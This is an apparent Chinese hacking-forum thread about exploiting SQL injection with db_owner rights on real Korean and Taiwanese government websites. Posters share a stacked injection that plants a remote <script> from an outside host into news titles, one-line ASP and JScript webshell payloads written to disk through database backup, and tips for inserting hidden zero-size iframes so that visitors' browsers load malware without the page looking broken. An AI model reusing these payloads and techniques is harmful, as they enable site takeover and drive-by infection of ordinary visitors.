[讨论]db_dbowner权限上传问题
文章作者:final信息来源:邪恶八进制
针对性的检测一韩国游戏的网站发现一注如点
用nbsi做分析出的到以下结果
2003系统+sql
当前库名 权限db
端口80 ,21
网站目录d:/xxx.....
前台管理员帐号
后台地址
想丛前台着手用sql语句 例
vote.asp?id=123;update news set title='xxx</a><script src=http://www.xxx.net/mm.asp></script>' where id=1;--
结果无效 毫无反应
试用nbsi上传脚本,脚本地址返回404错误 跟本没传上去
[s:75]
结束...
请教............... 貌似NBSI的上传功能需要SA权限吧 用差异备份或者LOG备份吧 反正知道路径DB-OWNER权限一般情况下拿到WEBSHELL应该不是问题了. 你现在知道路径了没?或者用安全天使的那个上传试一下! vote.asp?id=123;update news set title='xxx</a><script src=http://www.xxx.net/mm.asp></script>' where id=1;--
你查看的 投票id 是否是 1 ? vote.asp?id=123 ?
你改的 只是 id=1 的 你看下是否弄错了。 可能他只是想改ID=1的吧. 比较靠前~ [s:67] 想挂驴哇,数据库挂驴法,先找首页调用的数据库的页子 然后翻表,找对应字段,然后挂驴 有些标题是限制长度的了 ,建议用短一点的挂驴地址 o [s:37] 原来如此 我在试去................ 还有 我上面那个hack520 上次就是看了你签名里有什么 dirshell 我就去 dirdshell上面去找
我还以为是什么好玩意那 点了之后 爽死我了...............
整的我都崩溃了 什么都没了....... [s:75] [s:82] [s:82] 欢迎试用DIRSHELL,如果好用的话可推荐您的朋友一起使用哈哈。关于恢复方法我已经说了不下N次了。 [s:39] 数据库挂猪法,好像挂了后页面会排列错位,哪位N人给解决一下? 用数据库挂猪,还不入直接把数据库捆绑猪,这样还要容易些, [s:64] 最近搞了个台湾G0vernment站的注入,是DB-OWNER权限,费了一番周章找到了站点目录,首先用
<%%25Execute(request("ah"))%%25>备分成功,用LAKER大哥的一句话连接确定可用,
可是在用UPLOAD TEXTFILE上传文件时却出现了500错误,郁闷中....
以后依次用海洋的EVAL端<%eval request(("#"))%>,冰狐的EVAL端
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>
备分都不能够成功,所以想请教大家:
1:到底是哪里的原因出错?
2:有没有解决的办法?
谢谢大家! 楼上的。。我也遇到过`貌似是没有写入的权限。 汗,为什么要加ID=1这个条件呢?每个都挂上岂不是更好?
还有确定表名、字段名没错? 数据库挂马,要看页面的源代码,你插入数据的代码要跟页面源代码重新匹对,不然会破坏页面。
比如挂标题的吧,一般标题都是有链接的,代码类似:
<a href="http://www.xxxxx.com">挂马的标题</a>
如果单单在数据库中插入iframe,肯定会破坏原代码,使用页面混乱。所以应该看清源页面代码,再相应去重新匹对,以上可以插入 “桂马标题</a><iframe src=http://www.xxxxx.com width=0 height=0></ifrmae><a href="">
不过,在实际应用中,一般的标题都会被截断一段的,所以要想成功,还得看个人灵活应变能力。。。
页:
[1]